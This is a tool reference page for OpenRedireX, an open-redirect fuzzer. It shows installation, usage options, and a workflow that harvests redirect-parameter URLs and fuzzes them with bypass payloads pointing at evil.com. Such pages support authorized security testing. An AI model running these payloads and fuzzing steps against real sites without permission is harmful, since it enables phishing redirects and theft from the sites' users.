OpenRedireX — Exploitation | Tools

Description

OpenRedireX is a fuzzer designed specifically for finding open redirect vulnerabilities. It takes a list of URLs with potential redirect parameters and tests them with multiple payloads and bypass techniques.

Installation

BASH

                            git clone https://github.com/devanshbatham/OpenRedireX.git
cd OpenRedireX
pip3 install -r requirements.txt
                        

Basic Usage

                        BASH
                        
                            # Test URLs from file
python3 openredirex.py -l urls.txt -p payloads.txt

# Single URL
echo "https://target.com/login?redirect=FUZZ" | python3 openredirex.py -p payloads.txt

Advanced Usage

                        BASH
                        
                            # Custom keyword marker
python3 openredirex.py -l urls.txt -p payloads.txt -k "FUZZ"

# Concurrent requests
python3 openredirex.py -l urls.txt -p payloads.txt --max-concurrency 30

Common Workflows

                        BASH
                        
                    

                            # Step 1: Collect URLs with redirect parameters
gau target.com | grep -iE "=http|=https|=//|redirect|return|next|url|dest|rurl" | sort -u > redirect_candidates.txt

# Step 2: Create payload file
cat << 'EOF' > payloads.txt
https://evil.com
//evil.com
https://target.com@evil.com
/\evil.com
https://evil.com?.target.com
https://evil.com#.target.com
https://evil.com%23.target.com
EOF

# Step 3: Fuzz
python3 openredirex.py -l redirect_candidates.txt -p payloads.txt --max-concurrency 20
                        